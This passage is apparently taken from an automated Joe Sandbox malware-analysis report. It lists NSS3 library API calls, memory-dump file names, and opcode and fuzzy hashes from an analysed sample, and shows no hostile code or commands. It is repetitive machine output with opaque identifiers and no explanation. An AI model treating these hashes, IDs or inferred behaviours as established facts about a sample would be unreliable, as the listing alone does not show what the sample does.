                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CDEB999), ref: 6CDECFF3
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CDEB999), ref: 6CDED02B
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CDEB999), ref: 6CDED041
                                                                                                                                                                                                                                                                                                                      • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CDEB999), ref: 6CF3972B
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2cdb83eaf79c906fe67367cbeb4ddbcf18dd17370e191ebfe6c344b993ec1179
                                                                                                                                                                                                                                                                                                                      • Instruction ID: fbdc1e1efc03c4522a448097f5171e39804b7ebff6441ab22f0dde152ddcfe02
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cdb83eaf79c906fe67367cbeb4ddbcf18dd17370e191ebfe6c344b993ec1179
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F613671A042209BD310CF29C840BA6BBF1EF85318F28856DE4489BB82D777D947C7E1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CEF5B56
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CEF0113
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEF0130
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000040), ref: 6CEF015D
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000042,?,?), ref: 6CEF01AF
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD056,00000000), ref: 6CEF0202
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEF0224
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEF0253
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
                                                                                                                                                                                                                                                                                                                      • String ID: exporter
                                                                                                                                                                                                                                                                                                                      • API String ID: 712147604-111224270
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3f5a5186eaa66e5be08b9a02f29e7a588a7572b156fe33891b1084df4174c2bb
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ea4974efe72af7e69b06b772d4b27b5ef6b286cc45b0cdc3b37f14767e8938b7
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f5a5186eaa66e5be08b9a02f29e7a588a7572b156fe33891b1084df4174c2bb
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E761E3B2E007899FEF118FA4DC00BEE77B6BF4430CF244628ED2A56661E7329956C751
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CEC536F,00000022,?,?,00000000,?), ref: 6CEC4E70
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CEC4F28
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CEC4F8E
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CEC4FAE
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEC4FC8
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                                                                                                      • String ID: %s=%c%s%c$%s=%s$oSl"
                                                                                                                                                                                                                                                                                                                      • API String ID: 2709355791-450401312
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5fa22802e7ad3a89f732b26f15108d689272556b1a0f620a3369177494865af5
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a220a7fd39aed06ecb91ea4931a193781f58add090e7561b1168b24854a641c2
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fa22802e7ad3a89f732b26f15108d689272556b1a0f620a3369177494865af5
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83511771B051898FEB01CA6986917FF7BF59F4230CF3A8127E8B4ABB41D33598058792
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,6CF0A4A1,?,00000000,?,00000001), ref: 6CEEEF6D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(00000000,?,6CF0A4A1,?,00000000,?,00000001), ref: 6CEEEFE4
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(?,00000000,?,6CF0A4A1,?,00000000,?,00000001), ref: 6CEEEFF1
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,6CF0A4A1,?,00000000,?,6CF0A4A1,?,00000000,?,00000001), ref: 6CEEF00B
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CF0A4A1,?,00000000,?,00000001), ref: 6CEEF027
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: htonlmemcpy$ErrorValue
                                                                                                                                                                                                                                                                                                                      • String ID: dtls13
                                                                                                                                                                                                                                                                                                                      • API String ID: 242828995-1883198198
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4db640bdd1129a196f4292ac8cc78b4960e8ad95e02b8342473f41ca26394a57
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8dd45623cec10451c8880200b143d3e694e354cce4959404bd5980b159034878
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4db640bdd1129a196f4292ac8cc78b4960e8ad95e02b8342473f41ca26394a57
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24311471A01611AFC710CF68DC81B8AB7F4EF4939CF25802AE8189B751E731E915CBE5
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE6AFBE
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CF89500,6CE63F91), ref: 6CE6AFD2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6CE6B007
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6CE61666,?,6CE6B00C,?), ref: 6CEB6AFB
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CE6B02F
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE6B046
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6CE6B058
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6CE6B060
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                                                                                      • API String ID: 3627567351-3315324353
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ca42f56674b9b05c4618bc94e144dd98112598a8df9b879e97b330265db24d5f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c183fd1c07ea7bf018df495da0b5951e982a6f871fce5537ed768f8450f14aca
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca42f56674b9b05c4618bc94e144dd98112598a8df9b879e97b330265db24d5f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83310370954300DBDB108F259844BAA7BB4AF8632CF200619F8B59BBD1E7328509D797
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE640D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CE63F7F,?,00000055,?,?,6CE61666,?,?), ref: 6CE640D9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE640D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CE61666,?,?), ref: 6CE640FC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE640D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CE61666,?,?), ref: 6CE64138
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE63EC2
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE63ED6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE63EEE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CEB8D2D,?,00000000,?), ref: 6CEBFB85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEBFBB1
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE63F02
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6CE63F14
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6CE63F1C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CEC127C,00000000,00000000,00000000), ref: 6CEC650E
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE63F27
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
                                                                                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                                                                                      • API String ID: 1076417423-3315324353
                                                                                                                                                                                                                                                                                                                      • Opcode ID: fe8ad73608c6b29cc4a27c0e1ba88b9da14fe807ec6b5012a2b1549742befc7f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: dda328975425adbf72aebfd35a053d132b4d66013dd80f9be7886ca1ba507075
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8ad73608c6b29cc4a27c0e1ba88b9da14fe807ec6b5012a2b1549742befc7f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC213A75A04300ABD7148B15AC42FAB77B8FB8830CF10093DF959A7B41E731D518879B
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CEACD08
                                                                                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6CEACE16
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEAD079
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5470cbf635688a1e86594a6fd83490b779fa25eb917fd73602f2bf5581fa3c03
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6e7ba4017804f70b2cc9b71bd6335c8ca4d2abfcb4871015e3ce43bc31c16332
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5470cbf635688a1e86594a6fd83490b779fa25eb917fd73602f2bf5581fa3c03
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39C180B5A002199FDB10CF65CC80BDAB7F5BF48318F2441A8D948AB741E775AE96CF90
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CEA97C1,?,00000000,00000000,?,?,?,00000000,?,6CE87F4A,00000000), ref: 6CE9DC68
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: malloc.MOZGLUE(6CEB8D2D,?,00000000,?), ref: 6CEC0BF8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: TlsGetValue.KERNEL32(6CEB8D2D,?,00000000,?), ref: 6CEC0C15
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CE9DD36
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CE9DE2D
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CE9DE43
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CE9DE76
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CE9DF32
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CE9DF5F
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CE9DF78
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CE87F4A,00000000,?,00000000,00000000), ref: 6CE9DFAA
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1886645929-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d5f9c4cd91d4cccf023b63d3b89350ac58bd4fd63abcfb975a4441db9d6c7dce
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6981C479E066208BFF148E19C99136972B6DB6134CF34843AD91ACAFE1D778CA84C603
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CE73C76
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CE73C94
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE695B0: TlsGetValue.KERNEL32(00000000,?,6CE800D2,00000000), ref: 6CE695D2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE695B0: EnterCriticalSection.KERNEL32(?,?,?,6CE800D2,00000000), ref: 6CE695E7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE695B0: PR_Unlock.NSS3(?,?,?,?,6CE800D2,00000000), ref: 6CE69605
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE73CB2
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CE73CCA
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CE73CE1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE8AE42), ref: 6CE730AA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE730C7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CE730E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE73116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE7312B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PK11_DestroyObject.NSS3(?,?), ref: 6CE73154
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE73090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE7317E
